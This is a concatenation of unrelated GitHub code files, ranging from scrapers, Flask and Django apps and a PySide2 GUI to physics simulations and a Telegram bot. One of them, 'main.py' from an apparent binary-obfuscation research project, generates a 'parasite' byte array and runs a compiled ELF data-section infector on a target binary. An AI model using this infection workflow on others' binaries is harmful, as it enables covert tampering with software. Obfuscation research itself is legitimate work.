k.p.text == 'MEDICARE PROVIDER ID':\n quote['MEDICARE PROVIDER ID'] = k.span.text\n \n elif k.p.text == 'NATIONAL PROVIDER ID (NPI)':\n quote['NATIONAL PROVIDER ID (NPI)'] =k.span.text\n \n elif k.p.text == 'PROVIDER TYPE':\n quote['PROVIDER TYPE'] = k.span.text\n \n elif k.p.text == 'OWNERSHIP':\n quote['OWNERSHIP'] = k.span.text\n \n elif k.p.text == 'BEDS':\n quote['BEDS'] = k.span.text\n \n else:\n # if c == 6:\n if k.p.text == 'WEBSITE':\n if k.span.a['href'] != \"\":\n quote['WEBSITE'] = k.span.a['href']\n\n elif k.p.text == 'HEALTH SYSTEM AFFILIATION':\n quote['HEALTH SYSTEM AFFILIATION'] = k.span.a['href']\n\n \n \n \n \n\nquotes.append(quote)\nprint(quotes)\ncolumnsName = ['Name','ADDRESS','Phone','MEDICARE PROVIDER ID','NATIONAL PROVIDER ID (NPI)','WEBSITE','PROVIDER TYPE','OWNERSHIP','BEDS','HEALTH SYSTEM AFFILIATION']\nfilename = 'hospital.csv'\n# with open(filename, 'w', newline='') as f: \n# w = csv.DictWriter(f,columnsName) \n# w.writeheader() \n# w.writerow(quotes[0])\n\n\n\nwith open(filename, 'a', newline='') as f_object:\n dictwriter_object = DictWriter(f_object, fieldnames = columnsName)\n dictwriter_object.writerow(quotes[0])\n \n 
","repo_name":"shakeebanwar/Beautiful-Soap-Python","sub_path":"s.py","file_name":"s.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22984549623","text":"import time\nimport logging\n\nfrom poloniex import PublicAPI, PublicAPIError\nfrom .ticker import Ticker\n\nlogger = logging.getLogger(__name__)\n\n\nclass HttpDataCollector(PublicAPI):\n def __init__(self):\n PublicAPI.__init__(self)\n self.tickers = dict()\n self.last_update = int(time.time())\n\n def _update(self):\n orderbook = self.get_orderbook('all', 99)\n self.last_update = int(time.time())\n\n for key in orderbook:\n if key not in self.tickers:\n self.tickers[key] = Ticker(key)\n self.tickers[key].update(orderbook[key])\n\n ticker_keys = self.tickers.keys()\n for key in ticker_keys:\n if key not in orderbook:\n del self.tickers[key]\n\n def get_data(self):\n ts = int(time.time())\n self._update()\n data = []\n for key in self.tickers:\n lowest_ask, highest_bid = self.tickers[key].get_prices()\n asks, bids = self.tickers[key].get_volumes()\n if lowest_ask and highest_bid:\n record = [ts, key, lowest_ask, highest_bid, asks, bids]\n data.append(record)\n return data\n","repo_name":"zosimovaa/pdc","sub_path":"_depr/data_collector/poloniex_ob_volumes.py","file_name":"poloniex_ob_volumes.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38023645607","text":"# flake8: noqa:E501\n# pylint: disable=line-too-long\n# pylint: disable=import-outside-toplevel\nfrom celery import chain\n\nfrom core.models import WebinarApplication\nfrom core.tasks import (\n task_create_application_invoice,\n task_save_application_invoice_metadata,\n task_send_invoice_email,\n)\n\n\ndef dispatch_invoice_for_application(\n application: WebinarApplication, send_via_email: bool = True\n):\n \"\"\"Dispatch invoice for given application\"\"\"\n\n from core.services import ApplicationService\n\n application_service = ApplicationService(application)\n\n # Prevent blank invoice from being created\n if application_service.get_valid_participants().count() == 0:\n return\n\n invoice_jobs = [\n task_create_application_invoice.si(application.id), # type: ignore\n task_save_application_invoice_metadata.s(application.id), # type: ignore\n ]\n\n if send_via_email:\n invoice_jobs.append(\n task_send_invoice_email.si(application.invoice.invoice_email, application.id), # type: ignore\n )\n\n # Dispatch invoice tasks\n chain(*invoice_jobs).apply_async()\n","repo_name":"rolzwy7/wykladowcav2","sub_path":"src/core/tasks_dispatch/dispatch_invoice_for_application.py","file_name":"dispatch_invoice_for_application.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41632821386","text":"from flask import Flask, url_for, render_template, g, abort\nfrom DBManipulator import DBM\nimport sqlite3\nimport os\n\n\nDEBUG = True\nDATABASE = '/tmp/site_db.db'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.update(DATABASE=os.path.join(app.root_path, 'site_db.db'))\n\n\ndef connect_db():\n con = sqlite3.connect(app.config['DATABASE'])\n con.row_factory = sqlite3.Row\n return con\n\n\ndef create_db():\n db = connect_db()\n with app.open_resource('sq_db.sql', 'r') as file:\n db.cursor().executescript(file.read())\n db.commit()\n db.close()\n\n\ndef get_db():\n if not 
hasattr(g, 'link_db'):\n        g.link_db = connect_db()\n    return g.link_db\n\n\ndef dbm_thrower():\n    db = get_db()\n    dbase = DBM(db)\n    return dbase\n\n\n@app.route('/')\n@app.route('/main')\ndef main_page():\n    return render_template(\"mainpage.html\", title='Main', lorems=dbm_thrower().get_all_lorems(),\n                           site_menu=dbm_thrower().get_menu())\n\n\n@app.route('/lorem/<int:id_lorem>')\ndef show_lorem(id_lorem):\n    title, lorem = dbm_thrower().get_one_lorem(id_lorem)\n    if not title:\n        abort(404)\n    return render_template(\"chosenlorem.html\", title=title, lorem=lorem, site_menu=dbm_thrower().get_menu())\n\n\n@app.route('/about')\ndef about_page():\n    return render_template(\"aboutHW.html\", title='About', site_menu=dbm_thrower().get_menu())\n\n\n@app.route('/loremipsum')\ndef lorem_ipsum():\n    return render_template(\"loremipsum.html\", title='Fish text', site_menu=dbm_thrower().get_menu())\n\n\n@app.route('/github')\ndef github_page():\n    return render_template(\"github.html\", title=\"Git\")\n\n\n@app.teardown_appcontext\ndef close_db(error):\n    if hasattr(g, 'link_db'):  # 'link.db' was a typo; get_db() sets g.link_db\n        g.link_db.close()\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n    return render_template('page404.html', title=\"Not Found\", site_menu=dbm_thrower().get_menu()), 404\n\n\nif __name__ == '__main__':\n    app.run(debug=DEBUG)\n","repo_name":"animeh4ter/FlaskProjects","sub_path":"hw1main.py","file_name":"hw1main.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25357960920","text":"# toSketch.py\r\n# \r\n# Copyright 2010 Alex Dumitrache <alex@cimr.pub.ro>\r\n# \r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\r\n# MA 02110-1301, USA.\r\n\r\n# Exports current cgkit scene as a Sketch drawing (useful for including in documents)\r\n\r\nsketchTemplate = \"\"\"\r\ndef rgb<>\r\ndef limb<>\r\ninput{lib/defaults.sk}\r\n{\r\n input{lib/objects.sk}\r\n def style [cull=false, draw=black, fill=black!5]\r\n {coordsys}\r\n\r\n %s\r\n \r\n}\r\n\r\nglobal {\r\n language tikz\r\n camera %s * scale(20) then translate([0,0,-100]) then perspective(30)\r\n}\r\n\"\"\"\r\n\r\ndef trans2sk(T):\r\n sk = \"[[%g,%g,%g,%g] [%g,%g,%g,%g] [%g,%g,%g,%g] [%g,%g,%g,%g]]\" % tuple(T.toList(True))\r\n return sk\r\n\r\nbase.meshname = \"base\"\r\nlink1.meshname = \"link1\"\r\nlink2.meshname = \"link2\"\r\nlink3.meshname = \"link3\"\r\nlink4.meshname = \"link4\"\r\nlink5.meshname = \"link5\"\r\nlink6.meshname = \"link6\"\r\ngripper.meshname = \"grip\"\r\n\r\ndef toSketch(filename):\r\n scene = getScene()\r\n cam = worldObject('TargetCamera')\r\n lookat = cam.worldtransform * (0,0,1)\r\n skcam = \"view((%g,%g,%g),(%g,%g,%g),[%g,%g,%g])\" % (cam.pos.x, cam.pos.y, cam.pos.z, lookat.x, lookat.y, lookat.z, scene.up.x, scene.up.y, scene.up.z)\r\n sk = \"\"\r\n for b in getScene().walkWorld():\r\n if not b.visible: continue\r\n sk += \"\\n # %s\\n\" % b.name\r\n if type(b.geom) == cgkit.boxgeom.BoxGeom:\r\n sk += \" put {%s * scale([%g,%g,%g])}{box}\\n\" % (trans2sk(b.worldtransform), b.lx,b.ly,b.lz)\r\n elif hasattr(b, 'meshname'):\r\n sk += \" put {%s * scale(0.001) * rotate(180,[Z])}{input{meshes/%s.sk}{%s}}\\n\" % (trans2sk(b.worldtransform), b.meshname, b.meshname)\r\n ske = sketchTemplate % (sk,skcam)\r\n\r\n skf = open(os.path.join(sys.basepath, \"sketch\", filename + \".sk\"), \"w\")\r\n skf.write(ske)\r\n skf.close()\r\n","repo_name":"alexdu/robot-sandbox","sub_path":"sim-files/toSketch.py","file_name":"toSketch.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"} +{"seq_id":"73960326800","text":"from django.conf.urls import url\nfrom site_stats import views\n\napp_name = 'site_stats'\nurlpatterns = [\n url(r'text-stats/$', views.StatsTextStatsView.as_view(), name='text_stats'),\n url(r'prediction-chart/$', views.CommonPredictionChart.as_view(), name='prediction_chart'),\n url(r'points-chart/$', views.CommonPointsChart.as_view(), name='prediction_points'),\n url(r'users-selector/$', views.AllUsersListView.as_view(), name='user_selector'),\n url('user-graphs/(?P<pk>\\d+)', views.UserGraphsView.as_view(), name='graphs_per_user'),\n]\n","repo_name":"maddrum/world_cup_results","sub_path":"site_stats/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40989623223","text":"import time\nimport sys\nimport socket\nimport threading\n\nhost, port = \"127.0.0.1\", 25001\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((host, port))\nsock.send(b'1')\nprint(sock.recv(1024).decode())\n\ndef recvThreadFunc():\n while True:\n try:\n otherword = sock.recv(1024)\n if otherword:\n print(otherword.decode())\n else:\n pass\n except ConnectionAbortedError:\n print('Server closed this connection!')\n break\n \n except ConnectionResetError:\n print('Server 
is closed!')\n break\n\n\nt = threading.Thread(target=recvThreadFunc)\nt.setDaemon(True)\nt.start()\nt.join()","repo_name":"Mark840308/py_OpenVR","sub_path":"triad_openvr-master/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"30346468670","text":"# This Python file uses the following encoding: utf-8\r\nimport os, threading, requests\r\nfrom pathlib import Path\r\nimport sys\r\nimport datetime\r\nimport json\r\nimport time\r\nimport threading\r\n\r\nfrom PySide2.QtGui import QGuiApplication, QIcon\r\nfrom PySide2.QtWidgets import QApplication\r\nfrom PySide2.QtQml import QQmlApplicationEngine\r\nfrom PySide2.QtCore import QObject, Slot, Signal, QTimer, QUrl\r\nfrom PySide2.QtWebEngine import QtWebEngine\r\nfrom PySide2 import QtSvg\r\n\r\ndef colConv(num):\r\n if num == 0: return 'green'\r\n if num == 3: return 'red'\r\n return\r\n\r\nclass MainWindow(QObject,threading.Thread):\r\n def __init__(self):\r\n QObject.__init__(self)\r\n threading.Thread.__init__(self)\r\n\r\n # QTimer - Run Timer\r\n self.timer = QTimer()\r\n self.timer.timeout.connect(lambda: self.setTime())\r\n self.timer.start(1000)\r\n \r\n self.srvCat = 'http://127.0.0.1:8080/'\r\n self.dataStructure = {}\r\n self.context = {'gym':None,'room':None,'menu':None}\r\n self.updateFlag = {'gyms':False,'rooms':False,'devices':False}\r\n self.status = {}\r\n \r\n # Ale signals\r\n \r\n updElem = Signal('QVariant')\r\n gymSig = Signal(list)\r\n roomSig = Signal(list)\r\n devSig = Signal(list)\r\n adjSig = Signal(list)\r\n connStatus = Signal('Qvariant')\r\n \r\n signalAle = Signal(int)\r\n removeConfSig = Signal(int)\r\n\r\n # Signal Set Data\r\n printTime = Signal(str)\r\n \r\n def start_engine(self):\r\n QtWebEngine.initialize()\r\n self.engine = QQmlApplicationEngine()\r\n self.start()\r\n\r\n\r\n # Set Timer Function\r\n\r\n def setTime(self):\r\n now = datetime.datetime.now()\r\n formatDate = now.strftime(\"Now is %H:%M:%S of %Y/%m/%d\")\r\n #print(formatDate)\r\n self.printTime.emit(formatDate)\r\n \r\n @Slot(str,str)\r\n def retrieveData(self,gymName,roomName):\r\n print(\"\\n\\n\\nRetrive data!!!!\\n\\n\\n\")\r\n if gymName == 'None' and roomName == 'None':\r\n gymList = [{\"name\": \"San Donato\", \"status\": \"green\"}]\r\n self.gymSig.emit(gymList)\r\n if roomName == 'None':\r\n if gymName == \"San Donato\":\r\n roomList = [{\"name\": \"Cazzo\", \"status\": \"green\"}]\r\n else:\r\n roomList = [{\"name\": \"Prova\", \"status\": \"red\"}]\r\n self.roomSig.emit(roomList)\r\n else:\r\n deviceList = self.l3\r\n print(deviceList)\r\n self.deviceSig.emit(deviceList)\r\n \r\n @Slot(str)\r\n def receiveConfElem(self,actionDict):\r\n \r\n confElementDict = json.loads(actionDict)\r\n print(type(confElementDict))\r\n print(confElementDict)\r\n self.signalAle.emit(0)\r\n \r\n @Slot(str)\r\n def removeConf(self,confName):\r\n ######SE LA RIMOZIONE AVVIENE CON SUCCESSO FAI EMIT 0 ALTRIMENTI EMIT 1\r\n print(confName)\r\n self.removeConfSig.emit(0) #Se tutto ok\r\n \r\n #self.removeConfSig.emit(1) #Se qualcosa è andato storto\r\n\r\n @Slot()\r\n def sendConf(self):\r\n print(\"Invia conf dict allo SRM\")\r\n \r\n\r\n @Slot(str,str,str,str)\r\n def pairList(self,gym,room,m1,m2):\r\n print(f\"Pair List: {gym} {room} {m1} {m2}\")\r\n \r\n @Slot(str,str,str)\r\n def getAdjacency(self,selectedGym,selectedRoom,selectedDevice):\r\n print(f\"getAdjacency:{selectedGym} {selectedRoom} 
{selectedDevice}\")\r\n\r\n \r\n ###############################################\r\n ### QUESTO SLOT RICEVERA' IL JSON IN FORMATO \r\n ### STRINGA.\r\n ###############################################\r\n @Slot(str)\r\n def conf_SRM(self,actionDict):\r\n print(json.loads(actionDict))\r\n\r\n resetAllSig = Signal(int)\r\n @Slot()\r\n def sendConf(self):\r\n self.resetAllSig.emit(0)\r\n \r\n \r\n \r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n app.setOrganizationName('pythonProj')\r\n app.setOrganizationDomain('OD')\r\n # app.setWindowIcon(QIcon(\"images\\od_conf.svg\")) # convertire svg in pixmap\r\n # Get Context\r\n main = MainWindow()\r\n main.start_engine()\r\n\r\n # Set Context\r\n\r\n main.engine.rootContext().setContextProperty(\"backend\", main)\r\n \r\n # Load QML file\r\n main.engine.load(os.fspath(Path(__file__).resolve().parent / \"qml/main.qml\"))\r\n \r\n \r\n if not main.engine.rootObjects():\r\n sys.exit(-1)\r\n \r\n \r\n sys.exit(app.exec_())\r\n \r\n","repo_name":"Andrewxx93/Qt_Application_with_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"42273955565","text":"T = int(input())\n\ndef path(cur,cnt,value):\n global min_result\n px,py = arr[cur][0],arr[cur][1]\n\n\n if value > min_result:\n return\n if cnt == N:\n dis = abs(arr[1][0]-px) + abs(arr[1][1]-py)\n if value + dis < min_result:\n min_result = value +dis\n return\n\n for i in range(2,N+2):\n x,y = arr[i][0],arr[i][1]\n dis = abs(px-x)+abs(py-y)\n if not visited[i]:\n visited[i] = True\n path(i,cnt+1,value+dis)\n visited[i] = False\n\n \n\n\n\n\nfor tc in range(1,T+1):\n N = int(input())\n arr = []\n\n temp = list(map(int,input().split()))\n for i in range((N+2)):\n arr.append(temp[2*i:2*(i+1)])\n min_result = 999999999999999\n visited = [False]*(N+2)\n visited[0] = True\n path(0,0,0)\n print('#{} {}'.format(tc,min_result))","repo_name":"gkgg123/TIL","sub_path":"휴강기간_공부/알고리즘_0309/swea_1247_최적경로.py","file_name":"swea_1247_최적경로.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25182728533","text":"# Importing necessary libraries \nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import linalg\n\n\n# Setting up initial variables\nL = 1\nx = np.linspace(0, L, 1001)\na = L/1000\nh = 10**-4\ntime = np.arange(0, 0.1, h)\n\n\n# Setting up initial conditions\nx_0 = L/2.\nsigma = L/10.\nkappa = 50./L\npsi = np.exp(-1* ((x - x_0)**2)/(2*sigma**2)) * np.exp(1j * kappa * x)\npsi[0] = psi[-1] = 0\n\n\n# Setting up a1, a2, b1, b2\na1 = 1 + 1j*(h/(2*a**2))\na2 = -1j*(h/(4*a**2))\nb1 = 1 - 1j*(h/(2*a**2))\nb2 = 1j*(h/(4*a**2))\n\n\n# Creating matrix A\nN = 1001\nA_diag = np.ones(N, dtype=complex)*a1\nA_u = np.ones(N, dtype=complex) * a2\nA_u[0] = 0\nA_l = np.ones(N, dtype=complex) * a2\nA_l[-1] = 0\n# build matrix\nA = np.array([A_u, A_diag, A_l])\n\n\n# Getting psi values \npsi_values = []\n\nfor t in time:\n\n psi_values.append(psi)\n psiold = psi\n \n # calculate v\n psiold = np.concatenate(([0],psi,[0])) \n v = b1*psiold[1:-1] + b2*(psiold[2:]+psiold[:-2])\n \n # Solve matrix\n psi = linalg.solve_banded((1,1), A, v)\n psi[0] = psi[-1] = 0\n\n\n# Convert psi values list to array\npsi_values = np.array(psi_values, dtype=complex)\nreal_parts = np.real(psi_values)\n\n\n# Plot for time t=0\nplt.plot(x, real_parts[0], 
label='Psi(t=0.0000)')\nplt.xlabel('Position ($1x10^{-8}$m)', fontsize = 16)\nplt.ylabel('Amplitude', fontsize = 16)\nplt.ylim(-1.1,1.1)\nplt.legend()\nplt.savefig('t0000.png')\nplt.cla()\n\n\n# Plot for t=0.0012\nplt.plot(x, real_parts[120], label='Psi(t=0.0012)', color = 'orange')\nplt.xlabel('Position ($1x10^{-8}$m)', fontsize = 16)\nplt.ylabel('Amplitude', fontsize = 16)\nplt.ylim(-1.1,1.1)\nplt.legend()\nplt.savefig('t0012.png')\nplt.cla()\n\n\n# Plot for t=0.0020\nplt.plot(x, real_parts[200], label='Psi(t=0.0020)', color = 'green')\nplt.xlabel('Position ($1x10^{-8}$m)', fontsize = 16)\nplt.ylabel('Amplitude', fontsize = 16)\nplt.ylim(-1.1,1.1)\nplt.legend()\nplt.savefig('t0020.png')\nplt.cla()\n\n\n# Plot for t=0.0099\nplt.plot(x, real_parts[999], label='Psi(t=0.0099)', color = 'red')\nplt.xlabel('Position ($1x10^{-8}$m)', fontsize = 16)\nplt.ylabel('Amplitude', fontsize = 16)\nplt.ylim(-1.1,1.1)\nplt.legend()\nplt.savefig('t0099.png')\nplt.cla()","repo_name":"bjohnston0309/phys-ga2000","sub_path":"ps-9/Problem_1.py","file_name":"Problem_1.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"47578463409","text":"from ...abstasks.AbsTaskSTS import AbsTaskSTS\n\n\nclass BiossesSTS(AbsTaskSTS):\n @property\n def description(self):\n return {\n \"name\": \"BIOSSES\",\n \"hf_hub_name\": \"mteb/biosses-sts\",\n \"description\": \"Biomedical Semantic Similarity Estimation.\",\n \"reference\": \"https://tabilab.cmpe.boun.edu.tr/BIOSSES/DataSet.html\",\n \"type\": \"STS\",\n \"category\": \"s2s\",\n \"eval_splits\": [\"test\"],\n \"eval_langs\": [\"en\"],\n \"main_score\": \"cosine_spearman\",\n \"min_score\": 0,\n \"max_score\": 4,\n \"revision\": \"d3fb88f8f02e40887cd149695127462bbcf29b4a\",\n }\n","repo_name":"xlang-ai/instructor-embedding","sub_path":"evaluation/MTEB/mteb/tasks/STS/BiossesSTS.py","file_name":"BiossesSTS.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1419,"dataset":"github-code","pt":"22"} +{"seq_id":"29510715346","text":"# 10-DARS. IF-ELSE\n\n\"\"\"Yangi cars = ['toyota', 'mazda', 'hyundai', 'gm', 'kia'] degan ro'yxat tuzing, ro'yxat\nelementlarining birinchi harfini katta qilib konsolga chqaring. GM uchun ikkala harfni\nkatta qiling.\"\"\"\n\ncars = ['toyota', 'mazda', 'hyundai', 'gm', 'kia']\n\nfor car in cars:\n if car == 'gm':\n print(car.upper())\n else:\n print(car.title())\n# Output: Toyota\n# Output: Mazda\n# Output: Hyundai\n# Output: GM\n# Output: Kia\n\n\"\"\"Yuqoridagi mashqni teng emas (!=) operatori yordamida bajaring.\"\"\"\nfor car in cars:\n if car != 'gm':\n print(car.title())\n else:\n print(car.upper())\n# Output: Toyota\n# Output: Mazda\n# Output: Hyundai\n# Output: GM\n# Output: Kia\n\n\"\"\"Foydalanuvchi login ismini so'rang. Agar login admin bo'lsa, \"Xush kelibsiz, Admin.\nFoydalanuvchilar ro'yxatini ko'rasizmi?\" xabarini konsolga chiqaring. Aks holda,\n\"Xush kelibsiz, {foydalanuvchi_ismi}!\" matnini konsolga chiqaring.\"\"\"\nism = input('Loginingizni kiriting: ')\nif ism.lower() == 'admin':\n print(f\"Xush kelibsiz, {ism.title()}. Foydalanuvchilar ro\\'yxatini ko\\'rasizmi?\")\nelse:\n print(f\"Xush kelibsiz, {ism.title()}!\")\n# Output: Xush kelibsiz, Admin. Foydalanuvchilar ro'yxatini ko'rasizmi?\n# Output: Xush kelibsiz, Farrux! \n\n\"\"\"Foydalanuvchidan 2 ta son kiritishni so'rang. 
Agar ikki son bir-biriga teng bo'lsa,\n\"Sonlar teng\" ekan degan yozuvni konsolga chiqaring.\"\"\"\n\nbir_son = int(input('Birinchi sonni kiriting: '))\nikki_son = int(input('Ikkinchi sonni kiriting: '))\n\nif bir_son == ikki_son:\n print('Sonlar teng')\n# Output: Sonlar teng\n\n\"\"\"Foydalanuvchidan istalgan son kiritishni so'rang. Agar son manfiy bo'lsa konsolga\n\"Manfiy son\", agar musbat bo'lsa \"Musbat son\" degan xabarni chiqaring.\"\"\"\n\nistalgan_son = int(input('Sonni kiriting: '))\nif istalgan_son < 0:\n print('Manfiy son')\nelse:\n print('Musbat son')\n# Output: Manfiy son\n\n\"\"\"Foydalanuvchidan son kiritishni so'rang, agar son musbat bo'lsa uning ildizini\nhisoblab konsolga chiqaring. Agar son manfiy bo'lsa, \"Musbat son kiriting\" degan xabarni\nchiqaring.\"\"\"\nmusbat_son = int(input('Musbat sonni kiriting: '))\nif musbat_son > 0:\n print(f\"{musbat_son} sonining ildizi\", musbat_son**(1/2))\nelse:\n print('Musbat son kiriting')\n# Output: 25 sonining ildizi 5.0","repo_name":"KhasanovFarrukh/My_python_lessons","sub_path":"10-topshiriq.py","file_name":"10-topshiriq.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32570364385","text":"import os\nfrom dotenv import load_dotenv\nimport requests\nimport json\nfrom azure.cognitiveservices.speech import AudioDataStream, SpeechConfig, SpeechSynthesizer, SpeechSynthesisOutputFormat\nfrom azure.cognitiveservices.speech.audio import AudioOutputConfig\nimport asyncio\nimport time\n\nload_dotenv()\nSPEECH_KEY = os.getenv('AZURE_SPEECH')\nspeech_config = SpeechConfig(subscription=SPEECH_KEY, region=\"francecentral\")\n\nspeech_config.speech_synthesis_language = \"fr-FR\" \nspeech_config.speech_synthesis_voice_name =\"fr-FR-HenriNeural\"\n\nf = open('questions.json', \"r\", encoding='utf8')\nquest = json.load(f)\n\nn = 100\nx = 0\nk = 0\n\nfor q in quest[\"questions\"]:\n x = x+1\n if x > n :\n k = k+1\n if k > 3:\n time.sleep(60)\n k = 0\n audio_config = AudioOutputConfig(filename=\"speech/\"+ str(q[\"id\"])+\".mp3\")\n synthesizer = SpeechSynthesizer(speech_config=speech_config, audio_config=audio_config)\n result = synthesizer.speak_text_async(q[\"question\"]).get()\n stream = AudioDataStream(result)\n i = 0\n for a in q[\"answers\"]:\n i = i+1\n audio_config = AudioOutputConfig(filename=\"speech/\"+ str(q[\"id\"])+\"-\"+str(i)+\".mp3\")\n synthesizer = SpeechSynthesizer(speech_config=speech_config, audio_config=audio_config)\n result = synthesizer.speak_text_async(a[\"text\"]).get()\n stream = AudioDataStream(result)\n print(\"Question \"+str(q[\"id\"])+\" done\")","repo_name":"Toohk/red-cheester","sub_path":"speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"73777298936","text":"import re\nimport os\nimport sys\nimport getopt\nfrom pwn import *\nfrom getAsm import getAsm\nfrom editTextSection import EditTextSection\nfrom changeAsmToList import ChangeAsmToList\nfrom editDataSection import editDataSection\n\ncontext.arch = 'amd64'\n\nif __name__ == '__main__':\n input_filename = ''\n output_filename = ''\n try:\n opts, args = getopt.getopt(\n sys.argv[1:], \"hi:\", [\"input=\"])\n except getopt.GetoptError:\n print(\"[*] Usage: python %s -i <input-file>\" %\n sys.argv[0])\n sys.exit(-1)\n\n for opt, arg in opts:\n if opt == '-h':\n print(\"[*] Usage: python %s -i <input-file> -o 
<output-file>\" %\n              sys.argv[0])\n            sys.exit()\n        elif opt in (\"-i\", \"--input\"):\n            input_filename = arg\n\n    output_filename = input_filename+\"_obfed\"\n\n    if input_filename == \"\" or output_filename == \"\":\n        print(\"[!] Missing parameters!\")\n        exit(-1)\n\n    # function_table = getFunction(input_filename, output_filename)\n    # print(function_table)\n    # exit(0)\n    # asm_table = getAsm(input_filename, output_filename)\n    call_list, func_list = getAsm(input_filename, output_filename)\n    e = ELF(input_filename)\n    data_section = e.get_section_by_name('.data').header\n    bss_addr = data_section.sh_addr + data_section.sh_size\n    bss_section = e.get_section_by_name('.bss').header\n    bss_size = bss_section.sh_size\n    print(\"[+] .bss addr: \"+hex(bss_addr))\n    print(\"[+] .bss size: \"+hex(bss_size))\n\n    exit(0)\n\n    asm_to_add, func_list = editDataSection(\n        bss_addr+bss_size, func_list)\n    asm_list = ChangeAsmToList(asm_to_add, bss_size)\n    # print(asm_list)\n\n    # print(len(asm_list), \"\\nchar parasite[] = {\" + str(asm_list)[1:-1] + \"};\")\n\n    with open(\"data-infector/parasite.h\", 'w') as out_f:\n        out_f.write(\"char parasite[] = {\" + str(asm_list)[1:-1] + \"};\")\n# gcc -o ../temp/data_infector infect.c\n    EditTextSection(e, call_list, func_list, output_filename)\n\n    print(\"[+] gcc -o temp/data_infector data-infector/infect.c\")\n\n    if os.system(\"gcc -o temp/data_infector data-infector/infect.c\") != 0:\n        print(\"[-] Err\")\n        exit(0)\n    print(output_filename)\n    # exit(0)\n\n    print(\"temp/data_infector {} {}\".format(\"temp/\" + output_filename, \"temp/\"+input_filename+\"_latest\"))\n    if os.system(\"temp/data_infector {} {}\".format(\"temp/\"+output_filename, \"temp/\"+input_filename+\"_latest\")) != 0:\n        print(\"[-] Err\")\n        exit(0)\n","repo_name":"nuaa-s3lab/BinSEAL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"26955500483","text":"from consts import *\nfrom engine.botError import *\nfrom engine.valid import *\nimport telebot\nfrom telebot import types\nimport os.path\nfrom telebot.types import InlineKeyboardButton, InlineKeyboardMarkup\n\n@bot.message_handler(commands=['restart'])\ndef send_restart(message):\n    buttons_list=['/start']\n    restart_keyboard=Keyboard(buttons_list)\n    for user in ADMINS_ID_LIST:\n        bot.send_message(chat_id=user,text='Для возобновления работы с ботом нажмите на кнопку стандартного меню', reply_markup=restart_keyboard.get_keyboard())\n@bot.message_handler(commands=['start'])\ndef send_start(message,initial = True ):\n    \"\"\" Entry point of the interaction with the bot\n    - the user's data is checked against the team's player records\n    - additional data is requested and stored in the database\n    \"\"\"\n\n\n    if message.chat.id not in PLAYERS_ID_LIST: \n        if message.chat.id not in ADMINS_ID_LIST :\n            if initial == True:\n                bot.reply_to(message, f'Привет, для доступа обратись к админам команды')\n\n    if message.chat.id in ADMINS_ID_LIST:\n        user=User(message)\n        if initial ==True:\n            bot.send_message(chat_id=message.chat.id,text=f'Привет, {user.name}!')\n        MAIN_ADMIN(message)\n\n    else:\n        user = User(message)\n        if initial == True:\n\n            bot.send_message(chat_id=message.chat.id,text=f'Привет, {user.name}!')\n\n        buttons_list = ['Моя статистика','Команда']\n        menu_keyboard = Keyboard(buttons_list)\n\n        bot.send_message(chat_id=message.chat.id,text='Главное меню',reply_markup=menu_keyboard.get_keyboard())\n        
